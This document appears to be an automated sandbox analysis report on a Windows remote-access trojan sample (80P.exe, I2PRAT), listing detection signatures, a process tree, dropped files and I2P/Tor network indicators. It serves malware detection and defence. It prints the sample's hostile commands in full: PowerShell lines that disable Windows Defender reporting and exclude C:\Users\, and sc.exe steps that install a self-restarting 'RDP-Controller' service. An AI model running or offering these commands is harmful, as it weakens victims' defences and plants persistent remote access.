Edit tour

Windows Analysis Report
80P.exe

Overview

General Information

Sample name:	80P.exe
Analysis ID:	1589221
MD5:	f0cfd22855ee0cf1935a36ea32f15138
SHA1:	8d971dc8a0f41f2e2c9dbd80f4b0cd5e1f164a96
SHA256:	acc39a1fdfcecae66662397c3d8e49d29efaebd8739f1603870a01dd3a603db7
Tags:	exeI2Parcaeuser-aachum
Infos:

Detection

I2PRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (creates a PE file in dynamic memory)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected I2PRAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Connects to many ports of the same IP (likely port scanning)

Contains functionality to hide user accounts

Found Tor onion address

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Modifies Windows Defender protection settings

Performs DNS queries to domains with low reputation

Sigma detected: Execution from Suspicious Folder

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious New Service Creation

Sigma detected: Suspicious Program Location with Network Connections

Uses TOR for connection hidding

AV process strings found (often used to terminate AV products)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Connects to several IPs in different countries

Contains functionality to create new users

Contains functionality to dynamically determine API calls

Contains functionality to enumerate network shares

Contains functionality to enumerate running services

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query network adapater information

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Enables security privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries keyboard layouts

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Classification

Process Tree

System is w10x64

80P.exe (PID: 6856 cmdline: "C:\Users\user\Desktop\80P.exe" MD5: F0CFD22855EE0CF1935A36EA32F15138)

80P.exe (PID: 6984 cmdline: C:\Users\user\Desktop\80P.exe MD5: F0CFD22855EE0CF1935A36EA32F15138)

cmd.exe (PID: 6192 cmdline: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\vlvy6qwtf6rg470fegk71sh09imwbh3.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3696 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 6616 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 1516 cmdline: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'" MD5: 04029E121A0CFA5991749937DD22A1D9)

jvnu3e85o6ls9huft0apy3731vg.exe (PID: 5840 cmdline: "C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe" MD5: 2F829F1CB631D234C54F2E6C6F72EB57)

taskkill.exe (PID: 2496 cmdline: taskkill.exe /F /FI "SERVICES eq RDP-Controller" MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 6616 cmdline: sc.exe stop RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 2536 cmdline: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 6332 cmdline: sc.exe failure RDP-Controller reset= 1 actions= restart/10000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 6292 cmdline: sc.exe start RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 4632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

icacls.exe (PID: 3428 cmdline: icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18 MD5: 48C87E3B3003A2413D6399EA77707F5D)

conhost.exe (PID: 2032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

icacls.exe (PID: 2568 cmdline: icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl MD5: 48C87E3B3003A2413D6399EA77707F5D)

conhost.exe (PID: 2312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

main.exe (PID: 4124 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: BB070CFBD23A7BC6F2A0F8F6D167D207)

WerFault.exe (PID: 2496 cmdline: C:\Windows\system32\WerFault.exe -u -p 4124 -s 1232 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

svchost.exe (PID: 4956 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 5812 cmdline: C:\Windows\system32\WerFault.exe -pss -s 436 -p 4124 -ip 4124 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

main.exe (PID: 7008 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: BB070CFBD23A7BC6F2A0F8F6D167D207)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log	JoeSecurity_I2PRAT	Yara detected I2PRAT	Joe Security
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_main.exe_59e5c191145a7e657df69e5cbadfff4911e783_61e28721_1d12cab9-8df1-4b73-ab59-8d57e46c430f\Report.wer	JoeSecurity_I2PRAT	Yara detected I2PRAT	Joe Security
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E32.tmp.dmp	JoeSecurity_I2PRAT	Yara detected I2PRAT	Joe Security
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\update.pkg	JoeSecurity_I2PRAT	Yara detected I2PRAT	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000001F.00000002.2934870565.00000201EAE17000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_I2PRAT	Yara detected I2PRAT	Joe Security
00000014.00000002.2556948586.0000013B440BC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_I2PRAT	Yara detected I2PRAT	Joe Security
Process Memory Space: jvnu3e85o6ls9huft0apy3731vg.exe PID: 5840	JoeSecurity_I2PRAT	Yara detected I2PRAT	Joe Security
Process Memory Space: main.exe PID: 4124	JoeSecurity_I2PRAT	Yara detected I2PRAT	Joe Security
Process Memory Space: main.exe PID: 7008	JoeSecurity_I2PRAT	Yara detected I2PRAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, NewProcessName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, OriginalFileName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5812, ProcessCommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ProcessId: 4124, ProcessName: main.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\vlvy6qwtf6rg470fegk71sh09imwbh3.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6192, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 3696, ProcessName: powershell.exe

Sigma detected: Suspicious New Service Creation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe, ParentProcessId: 5840, ParentProcessName: jvnu3e85o6ls9huft0apy3731vg.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 2536, ProcessName: sc.exe

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 185.226.181.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, Initiated: true, ProcessId: 4124, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49738

Sigma detected: Powershell Defender Exclusion

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\vlvy6qwtf6rg470fegk71sh09imwbh3.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6192, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", ProcessId: 1516, ProcessName: powershell.exe

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe, ParentProcessId: 5840, ParentProcessName: jvnu3e85o6ls9huft0apy3731vg.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 2536, ProcessName: sc.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\vlvy6qwtf6rg470fegk71sh09imwbh3.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6192, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 3696, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 4956, ProcessName: svchost.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://netdb.i2p2.no/	Avira URL Cloud: Label: malware
Source: https://reseed.i2pgit.org/	Avira URL Cloud: Label: malware
Source: https://reseed2.i2p.net/hO	Avira URL Cloud: Label: malware
Source: https://reseed.i2pgit.org//p_lib.c	Avira URL Cloud: Label: malware
Source: https://reseed.i2pgit.org/A	Avira URL Cloud: Label: malware
Source: https://reseed.diva.exchange/	Avira URL Cloud: Label: malware
Source: https://reseed2.i2p.net/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll	ReversingLabs: Detection: 26%
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll	ReversingLabs: Detection: 31%
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	ReversingLabs: Detection: 69%
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe	ReversingLabs: Detection: 69%
Source: C:\Windows\Temp\I2Hoxnam	ReversingLabs: Detection: 50%
Source: C:\Windows\Temp\ia0qD2w9	ReversingLabs: Detection: 31%
Source: C:\Windows\Temp\wwgq2y6S	ReversingLabs: Detection: 26%

Multi AV Scanner detection for submitted file

Source: 80P.exe

Virustotal: Detection: 8%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe

Joe Sandbox ML: detected

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Desktop\80P.exe

Unpacked PE file: 0.2.80P.exe.3440000.1.unpack

Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe

File created: C:\Users\user\AppData\Local\Temp\installer.log

Jump to behavior

Source:	Binary string: RfxVmt.pdb source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, rfxvmt.dll.20.dr
Source:	Binary string: RfxVmt.pdbGCTL source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, rfxvmt.dll.20.dr

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE0E16387F NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,	20_2_00007FFE0E16387F
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE0E1638C3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,	20_2_00007FFE0E1638C3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 31_2_00007FFE116B387F NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,	31_2_00007FFE116B387F
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 31_2_00007FFE116B38C3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,	31_2_00007FFE116B38C3

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FF6BFD61CF3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	20_2_00007FF6BFD61CF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE0E166233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	20_2_00007FFE0E166233
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE0EB4B333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	20_2_00007FFE0EB4B333
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE0EBD4013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	20_2_00007FFE0EBD4013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE0EC05013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	20_2_00007FFE0EC05013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE115057B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	20_2_00007FFE115057B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE133031F3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	20_2_00007FFE133031F3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 31_2_00007FFE116B6233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	31_2_00007FFE116B6233
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 31_2_00007FFE116EB333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	31_2_00007FFE116EB333
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 31_2_00007FFE11714013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	31_2_00007FFE11714013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 31_2_00007FFE11745013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	31_2_00007FFE11745013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 31_2_00007FFE117757B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	31_2_00007FFE117757B3

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 4x nop then lea r9, qword ptr [r8-01h]	20_2_00007FF6BFD6737B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 4x nop then lea r9, qword ptr [r8-01h]	20_2_00007FFE0E16A13B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 4x nop then lea r9, qword ptr [r8-01h]	20_2_00007FFE0EB47DFB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 4x nop then lea r9, qword ptr [r8-01h]	20_2_00007FFE0EBD967B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 4x nop then lea r9, qword ptr [r8-01h]	20_2_00007FFE0EC0A67B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 4x nop then lea r9, qword ptr [r8-01h]	20_2_00007FFE1150293B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 4x nop then lea r9, qword ptr [r8-01h]	20_2_00007FFE13309BBB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 4x nop then lea r9, qword ptr [r8-01h]	31_2_00007FFE116BA13B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 4x nop then lea r9, qword ptr [r8-01h]	31_2_00007FFE116E7DFB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 4x nop then lea r9, qword ptr [r8-01h]	31_2_00007FFE1171967B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 4x nop then lea r9, qword ptr [r8-01h]	31_2_00007FFE1174A67B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 4x nop then lea r9, qword ptr [r8-01h]	31_2_00007FFE1177293B

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 173.209.166.184 ports 0,1,57108,5,7,8
Source: global traffic	TCP traffic: 174.119.206.85 ports 1,2,3,32791,7,9
Source: global traffic	TCP traffic: 95.158.36.98 ports 0,1,2,30125,3,5
Source: global traffic	TCP traffic: 134.16.78.198 ports 29107,0,1,2,7,9
Source: global traffic	TCP traffic: 46.139.242.51 ports 0,1,2,4,6,14602
Source: global traffic	TCP traffic: 95.31.23.9 ports 0,1,3,7,9,17903
Source: global traffic	TCP traffic: 175.215.255.118 ports 1,31497,3,4,7,9
Source: global traffic	TCP traffic: 89.223.52.84 ports 0,2,27690,6,7,9
Source: global traffic	TCP traffic: 46.138.247.227 ports 45301,0,1,3,4,5
Source: global traffic	TCP traffic: 79.119.11.221 ports 13529,1,2,3,5,9

Found Tor onion address

Source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,ht
Source: main.exe, 00000014.00000003.1930544269.0000013B45687000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
Source: main.exe, 00000014.00000003.1930731654.0000013B452B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
Source: main.exe, 00000014.00000003.1930622676.0000013B4567E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
Source: main.exe, 00000014.00000003.1910940308.0000013B452A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.onion.im/
Source: main.exe, 00000014.00000003.1930622676.0000013B45687000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
Source: main.exe, 00000014.00000003.1930980993.0000013B452B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
Source: main.exe, 00000014.00000003.1930980993.0000013B452B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
Source: main.exe, 00000014.00000002.2557742278.0000013B4520D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000014.00000003.1930576739.0000013B452B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
